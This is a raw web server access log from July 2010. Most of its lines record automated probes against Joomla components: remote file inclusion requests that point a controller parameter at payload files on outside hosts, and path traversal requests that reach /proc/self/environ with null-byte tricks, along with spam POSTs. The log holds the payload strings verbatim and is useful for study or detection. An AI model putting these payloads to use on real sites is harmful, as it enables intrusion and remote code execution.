74.124.198.60 - - [02/Jul/2010:13:54:09 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:54:09 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
87.106.52.92 - - [02/Jul/2010:14:09:07 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
87.106.52.92 - - [02/Jul/2010:14:08:58 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
89.108.67.172 - - [02/Jul/2010:14:09:47 -0700] "GET /scanhttp://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.elfagr.net"
87.106.52.92 - - [02/Jul/2010:14:10:21 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
87.106.52.92 - - [02/Jul/2010:14:10:11 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
87.106.52.92 - - [02/Jul/2010:14:10:11 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
87.106.52.92 - - [02/Jul/2010:14:11:04 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
87.106.52.92 - - [02/Jul/2010:14:10:54 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
87.106.52.92 - - [02/Jul/2010:14:10:54 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
87.106.52.92 - - [02/Jul/2010:14:10:58 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
87.106.52.92 - - [02/Jul/2010:14:11:08 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
87.106.52.92 - - [02/Jul/2010:14:10:58 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
87.106.52.92 - - [02/Jul/2010:14:11:34 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
87.106.52.92 - - [02/Jul/2010:14:11:24 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
87.106.52.92 - - [02/Jul/2010:14:11:24 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:12:23 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:12:23 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:12:34 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
67.195.111.171 - - [02/Jul/2010:14:13:08 -0700] "GET /logs/?D=A HTTP/1.0" 200 4783 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:13:25 -0700] "GET /logs/scripts.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
89.108.67.172 - - [02/Jul/2010:14:14:01 -0700] "GET /logs/access_100225.log/scanhttp://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.elfagr.net"
89.108.67.172 - - [02/Jul/2010:14:14:01 -0700] "GET /scanhttp://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.elfagr.net"
89.108.67.172 - - [02/Jul/2010:14:14:02 -0700] "GET /logs/scanhttp://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:17:37 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:17:39 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:17:30 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:18:41 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:18:58 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:19:07 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:20:55 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:21:28 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:21:28 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:21:28 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:21:45 -0700] "GET /logs/scripts.log//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:24:23 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:24:23 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:24:23 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
77.221.145.35 - - [02/Jul/2010:14:25:08 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.elfagr.net"
77.221.145.35 - - [02/Jul/2010:14:25:19 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.elfagr.net"
77.221.145.35 - - [02/Jul/2010:14:25:08 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.elfagr.net"
77.221.145.35 - - [02/Jul/2010:14:25:09 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.elfagr.net"
77.221.145.35 - - [02/Jul/2010:14:25:09 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.elfagr.net"
77.221.145.35 - - [02/Jul/2010:14:25:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.elfagr.net"
77.221.145.35 - - [02/Jul/2010:14:25:09 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.elfagr.net"
77.221.145.35 - - [02/Jul/2010:14:25:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.elfagr.net"
77.221.145.35 - - [02/Jul/2010:14:25:09 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.elfagr.net"
77.221.145.35 - - [02/Jul/2010:14:25:09 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.elfagr.net"
77.221.145.35 - - [02/Jul/2010:14:25:20 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.elfagr.net"
77.221.145.35 - - [02/Jul/2010:14:25:09 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "sledink Bot Search" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:26:09 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:14:26:19 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:14:26:29 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:14:26:19 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:27:57 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:27:57 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:27:58 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:28:41 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:28:56 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:28:58 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:30:54 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:30:46 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:30:58 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:14:31:22 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:14:31:11 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:14:31:22 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:31:54 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:31:54 -0700] "GET /logs/access.log//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:31:54 -0700] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4804 "-" "rk q kangen" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:32:26 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:32:21 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:32:38 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:35:24 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:35:35 -0700] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4804 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:35:24 -0700] "GET /logs/scripts.log//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:14:36:02 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:14:36:02 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:14:36:02 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:39:57 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:40:04 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:40:04 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:40:52 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:40:54 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [02/Jul/2010:14:41:11 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:14:41:25 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:14:41:25 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:14:41:25 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
93.158.149.32 - - [02/Jul/2010:14:46:09 -0700] "GET /logs/access_100603.log HTTP/1.1" 200 65536 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:14:47:45 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:14:47:34 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
93.186.192.124 - - [02/Jul/2010:14:47:34 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:57:14 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:57:24 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:57:14 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
66.249.65.59 - - [02/Jul/2010:14:57:38 -0700] "GET /test/admin/style.css HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.elfagr.net"
173.212.206.186 - - [02/Jul/2010:14:58:03 -0700] "GET /logs/access.log HTTP/1.1" 200 345126 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:14:58:14 -0700] "GET /logs/scripts.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
91.121.26.63 - - [02/Jul/2010:14:58:58 -0700] "GET /logs/access_100114.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
91.121.26.63 - - [02/Jul/2010:14:58:48 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
91.121.26.63 - - [02/Jul/2010:14:58:48 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
91.121.26.63 - - [02/Jul/2010:14:59:33 -0700] "GET /logs/access_100121.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
194.65.225.58 - - [02/Jul/2010:15:08:38 -0700] "GET /logs/access_100114.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
194.65.225.58 - - [02/Jul/2010:15:08:38 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
194.65.225.58 - - [02/Jul/2010:15:08:39 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
194.65.225.58 - - [02/Jul/2010:15:09:14 -0700] "GET /logs/access_100121.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:10:24 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:10:24 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:10:34 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:14:06 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:14:06 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:14:06 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
125.141.91.138 - - [02/Jul/2010:15:16:14 -0700] "GET /index.phphttp://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
125.141.91.138 - - [02/Jul/2010:15:16:48 -0700] "GET /index.php=optionhttp://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:15:16:59 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:15:17:41 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
